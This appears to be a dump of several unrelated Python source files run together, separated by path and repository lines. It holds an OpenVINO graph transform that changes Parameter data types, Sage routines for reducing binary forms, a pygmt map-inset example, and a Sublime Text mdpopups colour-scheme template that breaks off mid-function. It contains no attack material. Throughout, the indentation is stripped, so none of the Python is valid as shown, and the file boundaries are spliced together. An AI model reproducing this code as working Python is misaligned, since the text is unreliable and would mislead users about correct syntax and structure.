# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import logging as log
import numpy as np
from mo.front.common.replacement import FrontReplacementPattern
from mo.graph.graph import Graph, Node
class ChangePlaceholderTypes(FrontReplacementPattern):
enabled = True
run_not_recursively = True
@staticmethod
def is_node_casts_to_float_or_shapeof(node: Node):
return (node.soft_get('type') == 'Convert' and node.soft_get('dst_type') == np.float32) or \
node.soft_get('type') == 'ShapeOf'
def find_and_replace_pattern(self, graph: Graph):
for op in graph.get_op_nodes(type='Parameter'):
consumer_nodes = [p.node for p in op.out_port(0).get_destinations()]
if all([ChangePlaceholderTypes.is_node_casts_to_float_or_shapeof(consumer) for consumer in consumer_nodes]):
log.debug('Convert data type of Parameter "{}" to float32'.format(op.soft_get('name', op.id)))
op.data_type = np.float32
for convert_node in consumer_nodes:
if convert_node.soft_get('type') == 'Convert':
log.debug('Removing "Convert" node "{}"'.format(convert_node.soft_get('name', convert_node.id)))
# disconnect consumer ports of Convert operations. Then connect them with an output of Parameter
convert_destinations = convert_node.out_port(0).get_destinations()
for dst_port in convert_destinations:
dst_port.disconnect()
for dst_port in convert_destinations:
op.out_port(0).connect(dst_port)
graph.remove_node(convert_node.id)
if op.soft_get('data_type') == np.int64:
op.data_type = np.int32
log.error('Convert data type of Parameter "{}" to int32'.format(op.soft_get('name', op.id)),
extra={'is_warning': True})
if op.soft_get('data_type') == np.uint8:
op.data_type = np.float32
log.debug('Convert data type of Parameter "{}" to float'.format(op.soft_get('name', op.id)))
|
src/sage/rings/polynomial/binary_form_reduce.py | UCD4IDS/sage | 1,742 | 12687948 | # -*- coding: utf-8 -*-
r"""
Helper functions for reduction of binary forms.
The algorithm for reducing is from Stoll and Cremona's "On the Reduction Theory of
Binary Forms" [CS2003]_. This takes a two variable homogeneous polynomial and finds a
reduced form. This is an `SL(2,\ZZ)`-equivalent binary form whose covariant in
the upper half plane is in the fundamental domain. Further, the algorithm
from Hutz and Stoll [HS2018]_ allows the form to be further minimized so that
the coefficients have either smallest height or smallest `L_2` norm.
AUTHORS:
- <NAME> -- initial version of reduction as part of GSOC 2016
- <NAME> (2018-7) -- improvements to reduce and implement smallest coefficient model
"""
# ****************************************************************************
# Copyright (C) 2018 <NAME> <<EMAIL>>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from sage.calculus.functions import jacobian
from sage.functions.hyperbolic import cosh, sinh
from sage.functions.log import exp
from sage.matrix.constructor import matrix
from sage.misc.misc_c import prod
from sage.modules.free_module_element import vector
from sage.rings.cc import CC
from sage.rings.complex_mpfr import ComplexField
from sage.rings.complex_interval_field import ComplexIntervalField
from sage.rings.integer_ring import ZZ
from sage.rings.laurent_series_ring import LaurentSeriesRing
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.rings.rational_field import QQ
from sage.rings.real_mpfr import RealField
def covariant_z0(F, z0_cov=False, prec=53, emb=None, error_limit=0.000001):
r"""
Return the covariant and Julia invariant from Cremona-Stoll [CS2003]_.
In [CS2003]_ and [HS2018]_ the Julia invariant is denoted as `\Theta(F)`
or `R(F, z(F))`. Note that you may get faster convergence if you first move
`z_0(F)` to the fundamental domain before computing the true covariant
INPUT:
- ``F`` -- binary form of degree at least 3 with no multiple roots
- ``z0_cov`` -- boolean, compute only the `z_0` invariant. Otherwise, solve
the minimization problem
- ``prec``-- positive integer. precision to use in CC
- ``emb`` -- embedding into CC
- ``error_limit`` -- sets the error tolerance (default:0.000001)
OUTPUT: a complex number, a real number
EXAMPLES::
sage: from sage.rings.polynomial.binary_form_reduce import covariant_z0
sage: R.<x,y> = QQ[]
sage: F = 19*x^8 - 262*x^7*y + 1507*x^6*y^2 - 4784*x^5*y^3 + 9202*x^4*y^4\
....: - 10962*x^3*y^5 + 7844*x^2*y^6 - 3040*x*y^7 + 475*y^8
sage: covariant_z0(F, prec=80, z0_cov=True)
(1.3832330115323681438175 + 0.31233552177413614978744*I,
3358.4074848663492819259)
sage: F = -x^8 + 6*x^7*y - 7*x^6*y^2 - 12*x^5*y^3 + 27*x^4*y^4\
....: - 4*x^3*y^5 - 19*x^2*y^6 + 10*x*y^7 - 5*y^8
sage: covariant_z0(F, prec=80)
(0.64189877107807122203366 + 1.1852516565091601348355*I,
3134.5148284344627168276)
::
sage: R.<x,y> = QQ[]
sage: covariant_z0(x^3 + 2*x^2*y - 3*x*y^2, z0_cov=True)[0]
0.230769230769231 + 0.799408065031789*I
sage: -1/covariant_z0(-y^3 + 2*y^2*x + 3*y*x^2, z0_cov=True)[0]
0.230769230769231 + 0.799408065031789*I
::
sage: R.<x,y> = QQ[]
sage: covariant_z0(2*x^2*y - 3*x*y^2, z0_cov=True)[0]
0.750000000000000 + 1.29903810567666*I
sage: -1/covariant_z0(-x^3 - x^2*y + 2*x*y^2, z0_cov=True)[0] + 1
0.750000000000000 + 1.29903810567666*I
::
sage: R.<x,y> = QQ[]
sage: covariant_z0(x^2*y - x*y^2, prec=100) # tol 1e-28
(0.50000000000000000000000000003 + 0.86602540378443864676372317076*I,
1.5396007178390020386910634147)
TESTS::
sage: R.<x,y>=QQ[]
sage: covariant_z0(x^2 + 24*x*y + y^2)
Traceback (most recent call last):
...
ValueError: must be at least degree 3
sage: covariant_z0((x+y)^3, z0_cov=True)
Traceback (most recent call last):
...
ValueError: cannot have multiple roots for z0 invariant
sage: covariant_z0(x^3 + 3*x*y + y)
Traceback (most recent call last):
...
TypeError: must be a binary form
sage: covariant_z0(-2*x^2*y^3 + 3*x*y^4 + 127*y^5)
Traceback (most recent call last):
...
ValueError: cannot have a root with multiplicity >= 5/2
sage: covariant_z0((x^2+2*y^2)^2)
Traceback (most recent call last):
...
ValueError: must have at least 3 distinct roots
"""
R = F.parent()
d = ZZ(F.degree())
if R.ngens() != 2 or any(sum(t) != d for t in F.exponents()):
raise TypeError('must be a binary form')
if d < 3:
raise ValueError('must be at least degree 3')
f = F.subs({R.gen(1): 1}).univariate_polynomial()
if f.degree() < d:
# we have a root at infinity
if f.constant_coefficient() != 0:
# invert so we find all roots!
mat = matrix(ZZ, 2, 2, [0, -1, 1, 0])
else:
t = 0
while f(t) == 0:
t += 1
mat = matrix(ZZ, 2, 2, [t, -1, 1, 0])
else:
mat = matrix(ZZ, 2, 2, [1, 0, 0, 1])
f = F(list(mat * vector(R.gens()))).subs({R.gen(1): 1}).univariate_polynomial()
# now we have a single variable polynomial with all the roots of F
K = ComplexField(prec=prec)
if f.base_ring() != K:
if emb is None:
f = f.change_ring(K)
else:
f = f.change_ring(emb)
roots = f.roots()
if max(ex for _, ex in roots) > 1 or f.degree() < d - 1:
if z0_cov:
raise ValueError('cannot have multiple roots for z0 invariant')
else:
# just need a starting point for Newton's method
f = f.lc() * prod(p for p, ex in f.factor()) # removes multiple roots
if f.degree() < 3:
raise ValueError('must have at least 3 distinct roots')
roots = f.roots()
roots = [p for p, _ in roots]
# finding quadratic Q_0, gives us our covariant, z_0
dF = f.derivative()
n = ZZ(f.degree())
PR = PolynomialRing(K, 'x,y')
x, y = PR.gens()
# finds Stoll and Cremona's Q_0
q = sum([(1/(dF(r).abs()**(2/(n-2)))) * ((x-(r*y)) * (x-(r.conjugate()*y)))
for r in roots])
# this is Q_0 , always positive def as long as F has distinct roots
A = q.monomial_coefficient(x**2)
B = q.monomial_coefficient(x * y)
C = q.monomial_coefficient(y**2)
# need positive root
try:
z = ((-B + ((B**2)-(4*A*C)).sqrt()) / (2 * A))
except ValueError:
raise ValueError("not enough precision")
if z.imag() < 0:
z = (-B - ((B**2)-(4*A*C)).sqrt()) / (2 * A)
if z0_cov:
FM = f # for Julia's invariant
else:
# solve the minimization problem for 'true' covariant
CF = ComplexIntervalField(prec=prec) # keeps trac of our precision error
z = CF(z)
FM = F(list(mat * vector(R.gens()))).subs({R.gen(1): 1}).univariate_polynomial()
from sage.rings.polynomial.complex_roots import complex_roots
L1 = complex_roots(FM, min_prec=prec)
L = []
# making sure multiplicity isn't too large using convergence conditions in paper
for p, e in L1:
if e >= d / 2:
raise ValueError('cannot have a root with multiplicity >= %s/2' % d)
for _ in range(e):
L.append(p)
RCF = PolynomialRing(CF, 'u,t')
a = RCF.zero()
c = RCF.zero()
u, t = RCF.gens()
for l in L:
denom = ((t - l) * (t - l.conjugate()) + u**2)
a += u**2 / denom
c += (t - l.real()) / denom
# Newton's Method, to find solutions. Error bound is less than diameter of our z
err = z.diameter()
zz = z.diameter()
g1 = a.numerator() - d / 2 * a.denominator()
g2 = c.numerator()
G = vector([g1, g2])
J = jacobian(G, [u, t])
v0 = vector([z.imag(), z.real()]) # z0 as starting point
# finds our correct z
while err <= zz:
NJ = J.subs({u: v0[0], t: v0[1]})
NJinv = NJ.inverse()
# inverse for CIF matrix seems to return fractions not CIF elements, fix them
if NJinv.base_ring() != CF:
NJinv = matrix(CF, 2, 2, [CF(zw.numerator() / zw.denominator())
for zw in NJinv.list()])
w = z
v0 = v0 - NJinv*G.subs({u: v0[0], t: v0[1]})
z = v0[1].constant_coefficient() + v0[0].constant_coefficient()*CF.gen(0)
err = z.diameter() # precision
zz = (w - z).abs().lower() # difference in w and z
else:
# despite there is no break, this happens
if err > error_limit or err.is_NaN():
raise ValueError("accuracy of Newton's root not within tolerance(%s > %s), increase precision" % (err, error_limit))
if z.imag().upper() <= z.diameter():
raise ArithmeticError("Newton's method converged to z not in the upper half plane")
z = z.center()
# Julia's invariant
if FM.base_ring() != ComplexField(prec=prec):
FM = FM.change_ring(ComplexField(prec=prec))
tF = z.real()
uF = z.imag()
th = FM.lc().abs()**2
for r, ex in FM.roots():
for _ in range(ex):
th = th * ((((r-tF).abs())**2 + uF**2)/uF)
# undo shift and invert (if needed)
# since F \cdot m ~ m^(-1)\cdot z
# we apply m to z to undo m acting on F
l = mat * vector([z, 1])
return l[0] / l[1], th
# // compute inverse of eps_F
# from <NAME>
def epsinv(F, target, prec=53, target_tol=0.001, z=None, emb=None):
"""
Compute a bound on the hyperbolic distance.
The true minimum will be within the computed bound.
It is computed as the inverse of epsilon_F from [HS2018]_.
INPUT:
- ``F`` -- binary form of degree at least 3 with no multiple roots
- ``target`` -- positive real number. The value we want to attain, i.e.,
the value we are taking the inverse of
- ``prec``-- positive integer. precision to use in CC
- ``target_tol`` -- positive real number. The tolerance with which we
attain the target value.
- ``z`` -- complex number. ``z_0`` covariant for F.
- ``emb`` -- embedding into CC
OUTPUT: a real number delta satisfying target + target_tol > eps_F(delta) > target.
EXAMPLES::
sage: from sage.rings.polynomial.binary_form_reduce import epsinv
sage: R.<x,y> = QQ[]
sage: epsinv(-2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3, 31.5022020249597) # tol 1e-12
4.02520895942207
"""
def RQ(delta):
# this is the quotient R(F_0,z)/R(F_0,z(F)) for a generic z
# at distance delta from j. See Lemma 4.2 in [HS2018].
cd = cosh(delta).n(prec=prec)
sd = sinh(delta).n(prec=prec)
return prod([cd + (cost * phi[0] + sint * phi[1]) * sd for phi in phis])
def epsF(delta):
pol = RQ(delta) # get R quotient in terms of z
S = PolynomialRing(C, 'v')
g = S([(i - d) * pol[i - d] for i in range(2 * d + 1)]) # take derivative
drts = [e for e in g.roots(ring=C, multiplicities=False)
if (e.norm() - 1).abs() < 0.1]
# find min
return min([pol(r / r.abs()).real() for r in drts])
C = ComplexField(prec=prec)
R = F.parent()
d = F.degree()
if z is None:
z, th = covariant_z0(F, prec=prec, emb=emb)
else: # need to do our own input checking
if R.ngens() != 2 or any(sum(t) != d for t in F.exponents()):
raise TypeError('must be a binary form')
if d < 3:
raise ValueError('must be at least degree 3')
f = F.subs({R.gen(1): 1}).univariate_polynomial()
# now we have a single variable polynomial
if (max(ex for p, ex in f.roots(ring=C)) >= QQ(d)/2 or
f.degree() < QQ(d)/2):
raise ValueError('cannot have root with multiplicity >= deg(F)/2')
R = RealField(prec=prec)
PR = PolynomialRing(R, 't')
t = PR.gen(0)
# compute phi_1, ..., phi_k
# first find F_0 and its roots
# this change of variables on f moves z(f) to j, i.e. produces F_0
rts = f(z.imag()*t + z.real()).roots(ring=C)
phis = [] # stereographic projection of roots
for r, e in rts:
phis.extend([[2*r.real()/(r.norm()+1), (r.norm()-1)/(r.norm()+1)]])
if d != f.degree(): # include roots at infinity
phis.extend([(d - f.degree()) * [0, 1]])
# for writing RQ in terms of generic z to minimize
LC = LaurentSeriesRing(C, 'u', default_prec=2 * d + 2)
u = LC.gen(0)
cost = (u + u**(-1)) / 2
sint = (u - u**(-1)) / (2 * C.gen(0))
# first find an interval containing the desired value
# then use regula falsi on log eps_F
# d -> delta value in interval [0,1]
# v in value in interval [1,epsF(1)]
dl = R(0.0)
vl = R(1.0)
du = R(1.0)
vu = epsF(du)
while vu < target:
# compute the next value of epsF for delta = 2*delta
dl = du
vl = vu
du *= 2
vu = epsF(du)
# now dl < delta <= du
logt = target.log()
l2 = (vu.log() - logt).n(prec=prec)
l1 = (vl.log() - logt).n(prec=prec)
dn = (dl*l2 - du*l1)/(l2 - l1)
vn = epsF(dn)
dl = du
vl = vu
du = dn
vu = vn
while (du - dl).abs() >= target_tol or max(vl, vu) < target:
l2 = (vu.log() - logt).n(prec=prec)
l1 = (vl.log() - logt).n(prec=prec)
dn = (dl * l2 - du * l1) / (l2 - l1)
vn = epsF(dn)
dl = du
vl = vu
du = dn
vu = vn
return max(dl, du)
def get_bound_poly(F, prec=53, norm_type='norm', emb=None):
"""
The hyperbolic distance from `j` which must contain the smallest poly.
This defines the maximum possible distance from `j` to the `z_0` covariant
in the hyperbolic 3-space for which the associated `F` could have smaller
coefficients.
INPUT:
- ``F`` -- binary form of degree at least 3 with no multiple roots
- ``prec``-- positive integer. precision to use in CC
- ``norm_type`` -- string, either norm or height
- ``emb`` -- embedding into CC
OUTPUT: a positive real number
EXAMPLES::
sage: from sage.rings.polynomial.binary_form_reduce import get_bound_poly
sage: R.<x,y> = QQ[]
sage: F = -2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3
sage: get_bound_poly(F) # tol 1e-12
28.0049336543295
sage: get_bound_poly(F, norm_type='height') # tol 1e-11
111.890642019092
"""
if F.base_ring() != ComplexField(prec=prec):
if emb is None:
compF = F.change_ring(ComplexField(prec=prec))
else:
compF = F.change_ring(emb)
else:
compF = F
n = F.degree()
assert(n > 2), "degree 2 polynomial"
z0F, thetaF = covariant_z0(compF, prec=prec, emb=emb)
if norm_type == 'norm':
# euclidean norm squared
normF = (sum([abs(i)**2 for i in compF.coefficients()]))
target = (2**(n - 1)) * normF / thetaF
elif norm_type == 'height':
hF = exp(max([c.global_height(prec=prec) for c in F.coefficients()])) # height
target = (2**(n - 1)) * (n + 1) * (hF**2) / thetaF
else:
raise ValueError('type must be norm or height')
return cosh(epsinv(F, target, prec=prec))
def smallest_poly(F, prec=53, norm_type='norm', emb=None):
r"""
Determine the poly with smallest coefficients in `SL(2,\Z)` orbit of ``F``
Smallest can be in the sense of `L_2` norm or height.
The method is the algorithm in Hutz-Stoll [HS2018]_.
``F`` needs to be a binary form with no multiple roots of degree
at least 3. It should already be reduced in the sense of
Cremona-Stoll [CS2003]_.
INPUT:
- ``F`` -- binary form of degree at least 3 with no multiple roots
- ``norm_type`` -- string - ``norm`` or ``height`` controlling what ``smallest``
means for the coefficients.
OUTPUT: pair [poly, matrix]
EXAMPLES::
sage: from sage.rings.polynomial.binary_form_reduce import smallest_poly
sage: R.<x,y> = QQ[]
sage: F = -x^8 + 6*x^7*y - 7*x^6*y^2 - 12*x^5*y^3 + 27*x^4*y^4\
....: - 4*x^3*y^5 - 19*x^2*y^6 + 10*x*y^7 - 5*y^8
sage: smallest_poly(F, prec=100) #long time
[
-x^8 - 2*x^7*y + 7*x^6*y^2 + 16*x^5*y^3 + 2*x^4*y^4 - 2*x^3*y^5 + 4*x^2*y^6 - 5*y^8,
<BLANKLINE>
[1 1]
[0 1]
]
::
sage: from sage.rings.polynomial.binary_form_reduce import smallest_poly, get_bound_poly
sage: R.<x,y> = QQ[]
sage: F = -2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3
sage: smallest_poly(F)
[
[1 4]
-2*x^3 - 22*x^2*y - 77*x*y^2 + 43*y^3, [0 1]
]
sage: F0, M = smallest_poly(F, norm_type='height')
sage: F0, M # random
(
[5 4]
-58*x^3 - 47*x^2*y + 52*x*y^2 + 43*y^3, [1 1]
)
sage: M in SL2Z, F0 == R.hom(M * vector([x, y]))(F)
(True, True)
sage: get_bound_poly(F0, norm_type='height') # tol 1e-12
23.3402702199809
An example with a multiple root::
sage: R.<x,y> = QQ[]
sage: F = -16*x^7 - 114*x^6*y - 345*x^5*y^2 - 599*x^4*y^3 - 666*x^3*y^4\
....: - 481*x^2*y^5 - 207*x*y^6 - 40*y^7
sage: F.reduced_form()
(
[-1 -1]
-x^5*y^2 - 24*x^3*y^4 - 3*x^2*y^5 - 2*x*y^6 + 16*y^7, [ 1 0]
)
"""
def insert_item(pts, item, index):
# binary insertion to maintain list of points left to consider
N = len(pts)
if N == 0:
return [item]
elif N == 1:
if item[index] > pts[0][index]:
pts.insert(0, item)
else:
pts.append(item)
return pts
else: # binary insertion
left = 1
right = N
mid = (left + right) // 2 # these are ints so this is .floor()
if item[index] > pts[mid][index]: # item goes into first half
return insert_item(pts[:mid], item, index) + pts[mid:N]
else: # item goes into second half
return pts[:mid] + insert_item(pts[mid:N], item, index)
def coshdelta(z):
# The cosh of the hyperbolic distance from z = t+uj to j
return (z.norm() + 1)/(2*z.imag()) # reduce in the sense of Cremona-Stoll
G = F
MG = matrix(ZZ, 2, 2, [1, 0, 0, 1])
x, y = G.parent().gens()
if norm_type == 'norm':
current_size = sum([abs(i)**2 for i in G.coefficients()]) # euclidean norm squared
elif norm_type == 'height': # height
current_size = exp(max([c.global_height(prec=prec) for c in G.coefficients()]))
else:
raise ValueError('type must be norm or height')
v0, th = covariant_z0(G, prec=prec, emb=emb)
rep = 2 * CC.gen(0) # representative point in fundamental domain
from math import isnan
if isnan(v0.abs()):
raise ValueError("invalid covariant: %s" % v0)
R = get_bound_poly(G, prec=prec, norm_type=norm_type)
# check orbit
S = matrix(ZZ, 2, 2, [0, -1, 1, 0])
T = matrix(ZZ, 2, 2, [1, 1, 0, 1])
TI = matrix(ZZ, 2, 2, [1, -1, 0, 1])
count = 0
pts = [[G, v0, rep, MG, coshdelta(v0), 0]] # label - 0:None, 1:S, 2:T, 3:T^(-1)
current_min = [G, v0, rep, MG, coshdelta(v0)]
while pts:
G, v, rep, M, D, label = pts.pop()
# apply ST and keep z, Sz
if D > R:
break # all remaining pts are too far away
# check if it is smaller. If so, we can improve the bound
count += 1
if norm_type == 'norm':
new_size = sum([abs(i)**2 for i in G.coefficients()]) # euclidean norm squared
else: # height
new_size = exp(max([c.global_height(prec=prec) for c in G.coefficients()]))
if new_size < current_size:
current_min = [G, v, rep, M, coshdelta(v)]
current_size = new_size
R = get_bound_poly(G, norm_type=norm_type, prec=prec, emb=emb)
# add new points to check
if label != 1 and min((rep+1).norm(), (rep-1).norm()) >= 1: # don't undo S
# the 2nd condition is equivalent to |\Re(-1/rep)| <= 1/2
# this means that rep can have resulted from an inversion step in
# the shift-and-invert procedure, so don't invert
# do inversion
z = -1 / v
new_pt = [G.subs({x: -y, y: x}), z, -1/rep, M*S, coshdelta(z), 1]
pts = insert_item(pts, new_pt, 4)
if label != 3: # don't undo TI
# do right shift
z = v - 1
new_pt = [G.subs({x: x + y}), z, rep-1, M*T, coshdelta(z), 2]
pts = insert_item(pts, new_pt, 4)
if label != 2: # don't undo T
# do left shift
z = v + 1
new_pt = [G.subs({x: x - y}), z, rep + 1, M * TI, coshdelta(z), 3]
pts = insert_item(pts, new_pt, 4)
return [current_min[0], current_min[3]]
|
examples/gallery/embellishments/inset.py | jbusecke/pygmt | 326 | 12687949 | <reponame>jbusecke/pygmt
"""
Inset
-----
The :meth:`pygmt.Figure.inset` method adds an inset figure inside a larger
figure. The function is called using a ``with`` statement, and its
``position``, ``box``, ``offset``, and ``margin`` parameters are set. Plotting
methods called within the ``with`` statement are applied to the inset figure.
"""
import pygmt
fig = pygmt.Figure()
# Create the primary figure, setting the region to Madagascar, the land color
# to "brown", the water to "lightblue", the shorelines width to "thin", and
# adding a frame
fig.coast(region="MG+r2", land="brown", water="lightblue", shorelines="thin", frame="a")
# Create an inset, setting the position to top left, the width to 3.5 cm, and
# the x- and y-offsets to 0.2 cm. The margin is set to 0, and the border is
# "gold" with a pen size of 1.5p.
with fig.inset(position="jTL+w3.5c+o0.2c", margin=0, box="+p1.5p,gold"):
# Create a figure in the inset using coast. This example uses the azimuthal
# orthogonal projection centered at 47E, 20S. The land color is set to
# "gray" and Madagascar is highlighted in "red3".
fig.coast(
region="g",
projection="G47/-20/?",
land="gray",
water="white",
dcw="MG+gred3",
)
fig.show()
|
sublime/config/sublime-text-3.symlink/Packages/mdpopups/st3/mdpopups/st_scheme_template.py | ch1bo/dotfiles-old | 182 | 12687964 | <filename>sublime/config/sublime-text-3.symlink/Packages/mdpopups/st3/mdpopups/st_scheme_template.py<gh_stars>100-1000
"""
Sublime Text Scheme template.
Converts scheme to css provides templating for
additonal so that they can access the colors.
Licensed under MIT
Copyright (c) 2015 - 2016 <NAME> <<EMAIL>>
----------------------
TextMate theme to CSS.
https://manual.macromates.com/en/language_grammars#naming_conventions
"""
import sublime
import re
from . import version as ver
from .rgba import RGBA
from .st_color_scheme_matcher import ColorSchemeMatcher
import jinja2
from pygments.formatters import HtmlFormatter
from collections import OrderedDict
from .st_clean_css import clean_css
import copy
import decimal
NEW_SCHEMES = int(sublime.version()) >= 3150
INVALID = -1
POPUP = 0
PHANTOM = 1
LUM_MIDPOINT = 127
re_float_trim = re.compile(r'^(?P<keep>\d+)(?P<trash>\.0+|(?P<keep2>\.\d*[1-9])0+)$')
re_valid_custom_scopes = re.compile(r'[a-zA-Z\d]+[a-zA-Z\d._\-]*')
re_missing_semi_colon = re.compile(r'(?<!;) \}')
re_base_colors = re.compile(r'^\s*\.(?:dummy)\s*\{([^}]+)\}', re.MULTILINE)
re_color = re.compile(r'(?<!-)(color\s*:\s*#[A-Fa-z\d]{6})')
re_bgcolor = re.compile(r'(?<!-)(background(?:-color)?\s*:\s*#[A-Fa-z\d]{6})')
re_pygments_selectors = re.compile(r'\.dummy (\.[a-zA-Z\d]+) ')
CODE_BLOCKS = '.mdpopups .highlight, .mdpopups .inline-highlight { %s; %s; }'
def fmt_float(f, p=0):
"""Set float precision and trim precision zeros."""
string = str(
decimal.Decimal(f).quantize(decimal.Decimal('0.' + ('0' * p) if p > 0 else '0'), decimal.ROUND_HALF_UP)
)
m = re_float_trim.match(string)
if m:
string = m.group('keep')
if m.group('keep2'):
string += m.group('keep2')
return string
class SchemeTemplate(object):
"""Determine color scheme colors and style for text in a Sublime view buffer."""
def __init__(self, scheme_file):
"""Initialize."""
self.scheme_file = scheme_file
self.css_type = INVALID
self.variable = {}
self.view = None
self.setup()
def guess_style(self, view, scope, selected=False, explicit_background=False):
"""Guess color."""
# Remove leading '.' to account for old style CSS class scopes.
if not NEW_SCHEMES:
return self.csm.guess_color(scope.lstrip('.'), selected, explicit_background)
else:
scope_style = view.style_for_scope(scope.lstrip('.'))
style = {}
style['foreground'] = scope_style['foreground']
style['background'] = scope_style.get('background')
style['bold'] = scope_style['bold']
style['italic'] = scope_style['italic']
defaults = view.style()
if not explicit_background and not style.get('background'):
style['background'] = defaults.get('background', '#FFFFFF')
if selected:
sfg = scope_style.get('selection_forground', defaults.get('selection_forground'))
if sfg:
style['foreground'] = sfg
style['background'] = scope_style.get('selection', '#0000FF')
return style
def legacy_parse_global(self):
"""
Parse global settings.
LEGACY.
"""
self.csm = ColorSchemeMatcher(self.scheme_file)
# Get general theme colors from color scheme file
self.bground = self.csm.special_colors['background']['color_simulated']
rgba = RGBA(self.bground)
self.lums = rgba.get_true_luminance()
is_dark = self.lums <= LUM_MIDPOINT
self._variables = {
"is_dark": is_dark,
"is_light": not is_dark,
"sublime_version": int(sublime.version()),
"mdpopups_version": ver.version(),
"color_scheme": self.scheme_file,
"use_pygments": self.use_pygments,
"default_style": self.default_style
}
self.html_border = rgba.get_rgb()
self.fground = self.csm.special_colors['foreground']['color_simulated']
def get_variables(self):
"""Get variables."""
if NEW_SCHEMES:
is_dark = self.is_dark()
return {
"is_dark": is_dark,
"is_light": not is_dark,
"sublime_version": int(sublime.version()),
"mdpopups_version": ver.version(),
"color_scheme": self.scheme_file,
"use_pygments": self.use_pygments,
"default_style": self.default_style
}
else:
return self._variables
def get_html_border(self):
"""Get html border."""
return self.get_bg() if NEW_SCHEMES else self.html_border
def is_dark(self):
"""Check if scheme is dark."""
return self.get_lums() <= LUM_MIDPOINT
def get_lums(self):
"""Get luminance."""
if NEW_SCHEMES:
bg = self.get_bg()
rgba = RGBA(bg)
return rgba.get_true_luminance()
else:
return self.lums
def get_fg(self):
"""Get foreground."""
return self.view.style().get('foreground', '#000000') if NEW_SCHEMES else self.fground
def get_bg(self):
"""Get backtround."""
return self.view.style().get('background', '#FFFFFF') if NEW_SCHEMES else self.bground
def setup(self):
"""Setup the template environment."""
settings = sublime.load_settings("Preferences.sublime-settings")
self.use_pygments = not settings.get('mdpopups.use_sublime_highlighter', True)
self.default_style = settings.get('mdpopups.default_style', True)
if not NEW_SCHEMES:
self.legacy_parse_global()
# Create Jinja template
self.env = jinja2.Environment()
self.env.filters['css'] = self.retrieve_selector
self.env.filters['pygments'] = self.pygments
self.env.filters['foreground'] = self.to_fg
self.env.filters['background'] = self.to_bg
self.env.filters['brightness'] = self.brightness
self.env.filters['colorize'] = self.colorize
self.env.filters['hue'] = self.hue
self.env.filters['invert'] = self.invert
self.env.filters['saturation'] = self.saturation
self.env.filters['contrast'] = self.contrast
self.env.filters['grayscale'] = self.grayscale
self.env.filters['sepia'] = self.sepia
self.env.filters['fade'] = self.fade
self.env.filters['getcss'] = self.read_css
def read_css(self, css):
"""Read the CSS file."""
try:
var = copy.copy(self.variables)
var.update(
{
'is_phantom': self.css_type == PHANTOM,
'is_popup': self.css_type == POPUP
}
)
return self.env.from_string(
clean_css(sublime.load_resource(css))
).render(var=var, plugin=self.plugin_vars)
except Exception:
return ''
def fade(self, css, factor):
"""
Apply a fake transparency to color.
Fake transparency is preformed on top of the background color.
"""
try:
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1] + "%02f" % int(255.0 * max(min(float(factor), 1.0), 0.0)))
rgba.apply_alpha(self.get_bg())
return '%s: %s; ' % (parts[0], rgba.get_rgb())
except Exception:
pass
return css
def colorize(self, css, degree):
"""Colorize to the given hue."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.colorize(degree)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def hue(self, css, degree):
"""Shift hue."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.hue(degree)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def invert(self, css):
"""Invert color."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.invert()
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def contrast(self, css, factor):
"""Apply contrast filter."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.contrast(factor)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def saturation(self, css, factor):
"""Apply saturation filter."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.saturation(factor)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def grayscale(self, css):
"""Apply grayscale filter."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.grayscale()
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def sepia(self, css):
"""Apply sepia filter."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.sepia()
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def brightness(self, css, factor):
"""Adjust brightness."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] in ('background-color', 'color'):
rgba = RGBA(parts[1])
rgba.brightness(factor)
parts[1] = "%s; " % rgba.get_rgb()
return '%s: %s ' % (parts[0], parts[1])
return css
def to_fg(self, css):
"""Rename a CSS key value pair."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] == 'background-color':
parts[0] = 'color'
return '%s: %s; ' % (parts[0], parts[1])
return css
def to_bg(self, css):
"""Rename a CSS key value pair."""
parts = [c.strip('; ') for c in css.split(':')]
if len(parts) == 2 and parts[0] == 'color':
parts[0] = 'background-color'
return '%s: %s; ' % (parts[0], parts[1])
return css
def pygments(self, style):
"""Get pygments style."""
return get_pygments(style)
def retrieve_selector(self, selector, key=None, explicit_background=True):
